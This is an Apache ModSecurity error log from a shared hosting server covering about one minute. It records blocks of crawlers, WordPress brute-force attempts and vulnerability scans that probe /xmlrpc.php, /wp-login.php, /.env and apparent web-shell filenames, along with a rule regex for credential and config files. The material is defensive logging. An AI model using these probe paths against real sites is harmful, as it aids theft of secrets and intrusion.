[Tue May 26 12:56:51.575302 2026] [security2:error] [pid 461618:tid 461756] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLO1yiSlSCHr1fdr3FkQAAAI0"]
[Tue May 26 12:56:54.508082 2026] [security2:error] [pid 461618:tid 461761] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLPlyiSlSCHr1fdr3FxgAAAJI"]
[Tue May 26 12:56:55.355849 2026] [security2:error] [pid 461618:tid 461756] [client 185.191.171.19:58110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-20th/list/"] [unique_id "ahVLP1yiSlSCHr1fdr3F5AAAAI0"]
[Tue May 26 12:56:55.356020 2026] [security2:error] [pid 461618:tid 461756] [client 185.191.171.19:58110] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-20th/list/"] [unique_id "ahVLP1yiSlSCHr1fdr3F5AAAAI0"]
[Tue May 26 12:56:56.816829 2026] [security2:error] [pid 461618:tid 461859] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLQFyiSlSCHr1fdr3F_AAAAPQ"]
[Tue May 26 12:56:57.274969 2026] [security2:error] [pid 461618:tid 461811] [client 202.76.130.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLQFyiSlSCHr1fdr3GCAAAAMQ"]
[Tue May 26 12:56:59.525277 2026] [security2:error] [pid 461618:tid 461749] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLQ1yiSlSCHr1fdr3GNgAAAIY"]
[Tue May 26 12:57:01.958827 2026] [security2:error] [pid 461618:tid 461799] [client 157.20.138.61:65497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLRVyiSlSCHr1fdr3GcQAAALg"]
[Tue May 26 12:57:01.958970 2026] [security2:error] [pid 461618:tid 461799] [client 157.20.138.61:65497] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLRVyiSlSCHr1fdr3GcQAAALg"]
[Tue May 26 12:57:02.470546 2026] [security2:error] [pid 461618:tid 461821] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLRlyiSlSCHr1fdr3GeAAAAM4"]
[Tue May 26 12:57:04.448174 2026] [security2:error] [pid 461618:tid 461862] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLSFyiSlSCHr1fdr3GngAAAPc"]
[Tue May 26 12:57:06.379752 2026] [security2:error] [pid 461618:tid 461731] [remote 74.7.241.58:54368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVLSlyiSlSCHr1fdr3GzwAA83A"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 12:57:07.492587 2026] [security2:error] [pid 461618:tid 461852] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLS1yiSlSCHr1fdr3G2QAAAO0"]
[Tue May 26 12:57:10.408604 2026] [security2:error] [pid 461618:tid 461786] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLTVyiSlSCHr1fdr3HBgAAAKs"]
[Tue May 26 12:57:12.595213 2026] [security2:error] [pid 461618:tid 461769] [client 157.20.138.61:49479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLUFyiSlSCHr1fdr3HLgAAAJo"]
[Tue May 26 12:57:12.595365 2026] [security2:error] [pid 461618:tid 461769] [client 157.20.138.61:49479] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLUFyiSlSCHr1fdr3HLgAAAJo"]
[Tue May 26 12:57:12.635522 2026] [security2:error] [pid 461618:tid 461764] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLUFyiSlSCHr1fdr3HKgAAAJU"]
[Tue May 26 12:57:13.015839 2026] [security2:error] [pid 461618:tid 461873] [client 74.7.228.49:42278] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "wpdev.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVLT1yiSlSCHr1fdr3HHwABAkI"]
[Tue May 26 12:57:15.838522 2026] [security2:error] [pid 461618:tid 461843] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLU1yiSlSCHr1fdr3HdgAAAOQ"]
[Tue May 26 12:57:15.883175 2026] [security2:error] [pid 461618:tid 461763] [client 20.206.67.134:7633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-plain.php"] [unique_id "ahVLU1yiSlSCHr1fdr3HewAAAJQ"], referer: www.google.com
[Tue May 26 12:57:15.893236 2026] [security2:error] [pid 461618:tid 461846] [client 20.206.67.134:7625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVLU1yiSlSCHr1fdr3HfwAAAOc"], referer: www.google.com
[Tue May 26 12:57:18.586424 2026] [security2:error] [pid 461618:tid 461796] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLVlyiSlSCHr1fdr3HugAAALU"]
[Tue May 26 12:57:20.265657 2026] [core:error] [pid 461618:tid 461675] (13)Permission denied: [remote 74.7.227.172:46592] AH00132: file permissions deny server access: /home2/wrapmjh1/wpdev.wrapmachines.com/wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.woff, referer: https://wpdev.wrapmachines.com/
[Tue May 26 12:57:20.335832 2026] [security2:error] [pid 461618:tid 461832] [client 20.206.67.134:7666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/lbqidnyj.php"] [unique_id "ahVLWFyiSlSCHr1fdr3H5gAAANk"], referer: www.google.com
[Tue May 26 12:57:21.600761 2026] [security2:error] [pid 461618:tid 461811] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLWVyiSlSCHr1fdr3H9gAAAMQ"]
[Tue May 26 12:57:22.206902 2026] [security2:error] [pid 461618:tid 461863] [client 20.206.67.134:5195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVLWlyiSlSCHr1fdr3IBAAAAPg"]
[Tue May 26 12:57:22.983337 2026] [security2:error] [pid 461618:tid 461806] [client 157.20.138.61:49849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLWlyiSlSCHr1fdr3IDwAAAL8"]
[Tue May 26 12:57:22.983480 2026] [security2:error] [pid 461618:tid 461806] [client 157.20.138.61:49849] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLWlyiSlSCHr1fdr3IDwAAAL8"]
[Tue May 26 12:57:24.025946 2026] [security2:error] [pid 461618:tid 461830] [client 158.140.171.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLW1yiSlSCHr1fdr3IGQAAANc"]
[Tue May 26 12:57:24.277713 2026] [security2:error] [pid 461618:tid 461829] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLW1yiSlSCHr1fdr3IIgAAANY"]
[Tue May 26 12:57:26.602261 2026] [security2:error] [pid 461618:tid 461815] [client 20.206.67.134:7451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVLXlyiSlSCHr1fdr3IaQAAAMg"]
[Tue May 26 12:57:26.621174 2026] [security2:error] [pid 461618:tid 461793] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLXlyiSlSCHr1fdr3IXgAAALI"]
[Tue May 26 12:57:28.461873 2026] [security2:error] [pid 461618:tid 461854] [client 101.58.80.208:63711] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVLYFyiSlSCHr1fdr3IiAAAAO8"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 12:57:28.715883 2026] [security2:error] [pid 461618:tid 461799] [client 192.241.222.196:39836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/.env"] [unique_id "ahVLYFyiSlSCHr1fdr3IkwAAALg"]
[Tue May 26 12:57:28.885392 2026] [security2:error] [pid 461618:tid 461808] [client 114.119.135.96:32491] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/homepages/portfolio-minimal/"] [unique_id "ahVLYFyiSlSCHr1fdr3IlQAAAME"], referer: http://www.anujoverseas.in/homepages/portfolio-minimal/
[Tue May 26 12:57:29.416962 2026] [security2:error] [pid 461618:tid 461719] [remote 103.27.200.76:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.200.27.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVLYVyiSlSCHr1fdr3ImgAAoGQ"]
[Tue May 26 12:57:31.394215 2026] [security2:error] [pid 461618:tid 461825] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLYlyiSlSCHr1fdr3IsgAAANI"]
[Tue May 26 12:57:31.431509 2026] [security2:error] [pid 461618:tid 461844] [client 34.90.191.83:32768] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "consultrgb.moes-art.com"] [uri "/"] [unique_id "ahVLY1yiSlSCHr1fdr3ItwAAAOU"]
[Tue May 26 12:57:31.431607 2026] [security2:error] [pid 461618:tid 461844] [client 34.90.191.83:32768] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "consultrgb.moes-art.com"] [uri "/"] [unique_id "ahVLY1yiSlSCHr1fdr3ItwAAAOU"]
[Tue May 26 12:57:31.848138 2026] [security2:error] [pid 461618:tid 461779] [client 20.206.67.134:7462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-plain.php"] [unique_id "ahVLY1yiSlSCHr1fdr3IxQAAAKQ"], referer: www.google.com
[Tue May 26 12:57:31.848494 2026] [security2:error] [pid 461618:tid 461784] [client 20.206.67.134:5226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVLY1yiSlSCHr1fdr3IxgAAAKk"], referer: www.google.com
[Tue May 26 12:57:32.244445 2026] [security2:error] [pid 461618:tid 461810] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLY1yiSlSCHr1fdr3IxAAAAMM"]
[Tue May 26 12:57:32.996687 2026] [http2:info] [pid 470766:tid 470766] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 12:57:33.048139 2026] [security2:error] [pid 470766:tid 470899] [client 20.206.67.134:3917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVLZejO_W1DqEcFHQ7UXgAAAAM"]
[Tue May 26 12:57:33.422149 2026] [security2:error] [pid 470766:tid 470767] [remote 121.200.216.55:35860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVLZejO_W1DqEcFHQ7UZQAABAA"]
[Tue May 26 12:57:33.749749 2026] [security2:error] [pid 470766:tid 470898] [client 157.20.138.61:50207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLZejO_W1DqEcFHQ7UawAAAAI"]
[Tue May 26 12:57:33.749950 2026] [security2:error] [pid 470766:tid 470898] [client 157.20.138.61:50207] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLZejO_W1DqEcFHQ7UawAAAAI"]
[Tue May 26 12:57:34.959885 2026] [security2:error] [pid 470766:tid 470949] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLZujO_W1DqEcFHQ7UfAAAADU"]
[Tue May 26 12:57:35.390519 2026] [security2:error] [pid 470766:tid 470957] [client 20.206.67.134:5192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/asgukvix.php"] [unique_id "ahVLZ-jO_W1DqEcFHQ7UiwAAAD0"], referer: www.google.com
[Tue May 26 12:57:35.566915 2026] [security2:error] [pid 470766:tid 470925] [client 45.148.10.120:50146] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVLZujO_W1DqEcFHQ7UcgAAAB0"]
[Tue May 26 12:57:35.868311 2026] [security2:error] [pid 470766:tid 470991] [client 20.206.67.134:4044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVLZ-jO_W1DqEcFHQ7UnAAAAF8"]
[Tue May 26 12:57:35.996779 2026] [security2:error] [pid 470766:tid 470860] [remote 37.187.156.42:47134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVLZ-jO_W1DqEcFHQ7UmwAAVV0"]
[Tue May 26 12:57:36.423216 2026] [security2:error] [pid 470766:tid 471010] [client 74.7.230.11:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "support.mosykay.com"] [uri "/index.php"] [unique_id "ahVLaOjO_W1DqEcFHQ7UowAAAHI"]
[Tue May 26 12:57:36.423851 2026] [security2:error] [pid 470766:tid 471008] [client 74.7.230.11:40742] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "support.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVLaOjO_W1DqEcFHQ7UoQAAcEw"]
[Tue May 26 12:57:37.442690 2026] [security2:error] [pid 470766:tid 470926] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLaejO_W1DqEcFHQ7UvAAAAB4"]
[Tue May 26 12:57:40.275693 2026] [security2:error] [pid 470766:tid 470939] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLa-jO_W1DqEcFHQ7VAwAAACs"]
[Tue May 26 12:57:43.034064 2026] [security2:error] [pid 470766:tid 470949] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLbujO_W1DqEcFHQ7VOAAAADU"]
[Tue May 26 12:57:44.209606 2026] [security2:error] [pid 470766:tid 470978] [client 157.20.138.61:50568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLcOjO_W1DqEcFHQ7VXAAAAFI"]
[Tue May 26 12:57:44.209750 2026] [security2:error] [pid 470766:tid 470978] [client 157.20.138.61:50568] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLcOjO_W1DqEcFHQ7VXAAAAFI"]
[Tue May 26 12:57:45.722872 2026] [security2:error] [pid 470766:tid 470923] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLcejO_W1DqEcFHQ7VdQAAABs"]
[Tue May 26 12:57:47.314385 2026] [security2:error] [pid 470766:tid 470920] [client 66.249.64.42:59593] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLcujO_W1DqEcFHQ7ViQAAABg"], referer: https://mosykay.com/products/4261784/
[Tue May 26 12:57:48.371251 2026] [security2:error] [pid 470766:tid 470967] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLc-jO_W1DqEcFHQ7VsQAAAEc"]
[Tue May 26 12:57:48.774105 2026] [security2:error] [pid 470766:tid 470999] [client 104.28.122.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVLdOjO_W1DqEcFHQ7VwgAAAGc"]
[Tue May 26 12:57:48.995221 2026] [core:error] [pid 470766:tid 470809] (13)Permission denied: [remote 74.7.227.172:34542] AH00132: file permissions deny server access: /home2/wrapmjh1/wpdev.wrapmachines.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-brands-400.woff2, referer: https://wpdev.wrapmachines.com/
[Tue May 26 12:57:49.494137 2026] [core:error] [pid 470766:tid 470812] (13)Permission denied: [remote 74.7.227.172:34542] AH00132: file permissions deny server access: /home2/wrapmjh1/wpdev.wrapmachines.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-regular-400.woff2, referer: https://wpdev.wrapmachines.com/
